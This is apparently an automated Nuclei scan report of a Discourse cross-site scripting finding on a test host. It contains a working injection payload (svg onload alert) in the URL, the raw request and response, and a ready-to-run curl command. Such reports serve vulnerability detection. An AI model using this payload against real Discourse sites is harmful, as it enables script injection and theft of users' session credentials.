Discourse - Cross-Site Scripting (discourse-xss) found on honey.scanme.sh

[mkrs2404]

Details: discourse-xss matched at honey.scanme.sh

Protocol: HTTP

Full URL: https://honey.scanme.sh/email/unsubscribed?email=test@gmail.com%27\%22%3E%3Csvg/onload=alert(/xss/)%3E

Timestamp: Tue Apr 30 19:29:01 +0530 IST 2024

Template Information

Key	Value
Name	Discourse - Cross-Site Scripting
Authors	madrobot
Tags	xss, discourse
Severity	high
Description	Discourse contains a cross-site scripting vulnerability. An attacker can execute arbitrary script and thus steal cookie-based authentication credentials and launch other attacks.
CVSS-Metrics	CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
CWE-ID	CWE-79
CVSS-Score	7.20

Request

GET /email/unsubscribed?email=test@gmail.com%27\%22%3E%3Csvg/onload=alert(/xss/)%3E HTTP/1.1
Host: honey.scanme.sh
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 whid/gyr1 macaddress/7cd30a7dfad2
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK
Connection: close
Content-Length: 303
Content-Type: text/html
Date: Tue, 30 Apr 2024 13:59:01 GMT

GET /email/unsubscribed?email=test@gmail.com'\"><svg/onload=alert(/xss/)> HTTP/1.1
Host: honey.scanme.sh
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 whid/gyr1 macaddress/7cd30a7dfad2

References:

• https://www.cvedetails.com/vulnerability-list/vendor_id-20185/product_id-57316/opxss-1/Discourse-Discourse.html
• https://github.com/discourse/discourse/security/advisories/GHSA-xhmc-9jwm-wqph

CURL command

curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 whid/gyr1 macaddress/7cd30a7dfad2' 'https://honey.scanme.sh/email/unsubscribed?email=test@gmail.com%27\%22%3E%3Csvg/onload=alert(/xss/)%3E'

---

Generated by Nuclei v3.2.5